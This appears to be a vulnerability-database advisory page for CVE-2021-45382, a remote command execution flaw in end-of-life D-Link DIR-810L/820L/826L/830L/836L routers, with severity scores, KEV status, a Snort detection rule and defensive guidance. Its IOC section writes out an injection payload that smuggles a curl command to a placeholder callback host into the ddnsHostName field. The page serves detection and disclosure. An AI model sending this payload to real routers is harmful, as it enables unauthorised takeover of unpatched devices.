cbcvebase.
CVE-2021-45382
published 2022-02-17

CVE-2021-45382: A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via…

PriorityP193critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-25
Exploited in the wild
EPSS
97.84%
99.9th percentile
A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file. Note: DIR-810L, DIR-820L, DIR-830L, DIR-826L, DIR-836L, all hardware revisions, have reached their End of Life ("EOL") /End of Service Life ("EOS") Life-Cycle and as such this issue will not be patched.

Detection & IOCsextracted from sources · hover to see the quote

url/ddns_check.ccp
commandccp_act=doCheck&ddnsHostName=;curl https://{{interactsh-url}};&ddnsUsername={{string1}}&ddnsPassword={{string2}}
filenamencc2
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT D-Link - RCE Attempt Inbound (CVE-2021-45382)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/ddns_check.ccp"; fast_pattern; http.request_body; content:"&ddnsHostName="; pcre:"/^(?:\x3b|\x0a|\x26|\x60|\x7c|\x24)/R"; reference:cve,2021-45382; classtype:attempted-admin; sid:2035747; rev:2; metadata:attack_target Networking_Equipment, created_at 2022_04_05, cve CVE_2021_45382, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag CISA_KEV, updated_at 2024_03_08;)
  • Exploit targets HTTP POST requests to the /ddns_check.ccp endpoint; inspect the ddnsHostName parameter for shell metacharacters (;, newline, &, backtick, |, $) immediately following the value.
  • The Nuclei template confirms exploitation via out-of-band HTTP callback (interactsh); look for outbound curl requests originating from D-Link router IPs as a post-exploitation indicator.
  • The vulnerability is unauthenticated and network-accessible (CVSS AV:N/AC:L/PR:N); no authentication bypass is required — any POST to /ddns_check.ccp with an injected ddnsHostName is a direct exploitation attempt.
  • The ET rule (SID 2035747) is tagged CISA_KEV and classified attempted-admin; deploy at both Perimeter and Internal network segments for full coverage.
  • ·All affected D-Link models (DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, DIR-836L) are End-of-Life/End-of-Service; no patch will be issued. Detection is the only mitigation short of device replacement.
  • ·CISA mandates disconnection of affected devices if still in use; passive detection rules alone are insufficient — asset inventory should be used to identify and isolate these routers.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.